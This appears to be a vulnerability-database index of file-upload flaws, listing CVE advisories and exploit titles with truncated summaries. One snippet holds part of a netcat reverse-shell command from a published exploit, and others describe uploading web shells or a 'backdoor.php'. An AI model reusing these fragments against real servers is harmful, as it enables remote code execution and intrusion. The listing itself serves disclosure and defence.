CVE-2024-35592

An arbitrary file upload vulnerability in the Upload function of Box-IM v2.0 allows attackers to execute arbitrary code via uploading a crafted PDF file...

CVE-2024-33529

ILIAS 7 before 7.30 and ILIAS 8 before 8.11 as well as ILIAS 9.0 allow remote authenticated attackers with administrative privileges to execute operating system commands via file uploads with dangerous types...

PT-2024-3651 · D Link · D-Link Dar-7000-40 +2

Name of the Vulnerable Software and Affected Versions: D-Link DAR-7000-40 version V31R02B1413C D-Link DAR-7000 affected versions not specified D-Link DAR-8000 affected versions not specified Description: A critical vulnerability was found in the D-Link DAR-7000 and DAR-8000 routers, affecting an...

CVE-2023-6282

IceHrm 23.0.0.OS does not sufficiently encode user-controlled input, which creates a Cross-Site Scripting XSS vulnerability via /icehrm/app/fileuploadpage.php, in multiple parameters. An attacker could exploit this vulnerability by sending a specially crafted JavaScript payload and partially...

Online Student Clearance System 1.0 Shell Upload Exploit

!/usr/bin/python3 Exploit Title: Online Student Clearance System - Unrestricted File Upload to RCE Authenticated Date: 28/11/2023 Exploit Author: Akash Pandey aka l3v1ath0n Version: &1|nc " + localip + " " + localport + " /tmp/f" Firing request to login logurl = weburl+"login.php" Telling script ...

Architect HTML And Site Builder 2.2.3 File Upload

==================================================================================================================================== | Title : Architect - HTML and Site Builder V 2.2.3 Remote File Upload vulnerability | | Author : indoushka | | Tested on : windows 10 Français V.Pro / browser :...

Online Pizza Ordering System v1.0 - Unauthenticated File Upload Exploit

Exploit Title: Online Pizza Ordering System 1.0 - Unauthenticated File Upload Exploit Author: URGAN Vendor Homepage: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html Software Link:...

CVE-2023-0670

Ulearn version a5a7ca20de859051ea0470542844980a66dfc05d allows an attacker with administrator permissions to obtain remote code execution on the server through the image upload functionality. This occurs because the application does not validate that the uploaded image is actually an image...

CVE-2023-27855 Rockwell Automation ThinManager ThinServer Path Traversal Upload

In affected versions, a path traversal exists when processing a message in Rockwell Automation's ThinManager ThinServer. An unauthenticated remote attacker could potentially exploit this vulnerability to upload arbitrary files to any directory on the disk drive where ThinServer.exe is installed...

CVE-2023-25727

In phpMyAdmin before 4.9.11 and 5.x before 5.2.1, an authenticated user can trigger XSS by uploading a crafted .sql file through the drag-and-drop interface...

CVE-2021-36426

File Upload vulnerability in phpwcms 1.9.25 allows remote attackers to run arbitrary code via crafted file upload to include/inclib/general.inc.php...

Multiple themes - Unauthenticated Arbitrary File Upload

Multiple themes from ChimpStudio and PixFill does not have any authorisation and upload validation in the langupload.php file, allowing any unauthenticated attacker to upload arbitrary files to the web server. Create a malicious file "backdoor.php", then curl...

CVE-2022-26352

An issue was discovered in the ContentResource API in dotCMS 3.0 through 22.02. Attackers can craft a multipart form request to post a file whose filename is not initially sanitized. This allows directory traversal, in which the file is saved outside of the intended storage location. If anonymous...

TYPO3 doesn't properly check file extensions

The 1 file upload component and 2 File Abstraction Layer FAL in TYPO3 6.0.x before 6.0.8 and 6.1.x before 6.1.3 do not properly check file extensions, which allow remote authenticated editors to execute arbitrary PHP code by uploading a .php file...

Social Codia SMS 1 Shell Upload Exploit

sms-Unrestricted-File-Upload-RCE-POC Author: D4rkP0w4r Description - Upload web shell at avartar teacher in admin panel Step to Reproduct Login to admin - Teacher - Add Teacher - upload web shell at avartar teacher - Add Teacher Exploit Upload web shell at avartar teacher When upload success acce...

CVE-2022-21650 Stored XSS via html file upload in convos

Convos is an open source multi-user chat that runs in a web browser. You can't use SVG extension in Convos' chat window, but you can upload a file with an .html extension. By uploading an SVG file with an html extension the upload filter can be bypassed. This causes Stored XSS. Also, after...

Tad Web Authorization Issues Vulnerability

Tad Web is a multiplayer web module by the individual developer of Tad in Taiwan, China. An authorization issue vulnerability exists in Tad Web, which can be exploited by attackers to view announcements and upload files without logging in...

Online Reviewer System 1.0 - Remote Code Execution (Unauthenticated) Exploit

Exploit Title: Online Reviewer System 1.0 - Remote Code Execution RCE Unauthenticated Exploit Author: Abdullah Khawaja Vendor Homepage: https://www.sourcecodester.com/php/12937/online-reviewer-system-using-phppdo.html Software Link:...

CVE-2021-38753

An unrestricted file upload on Simple Image Gallery Web App can be exploited to upload a web shell and executed to gain unauthorized access to the server hosting the web app...

WordPress wpDiscuz 7.0.4 Shell Upload Exploit

This Metasploit module exploits an arbitrary file upload in the WordPress wpDiscuz plugin versions from 7.0.0 through 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable server. This module...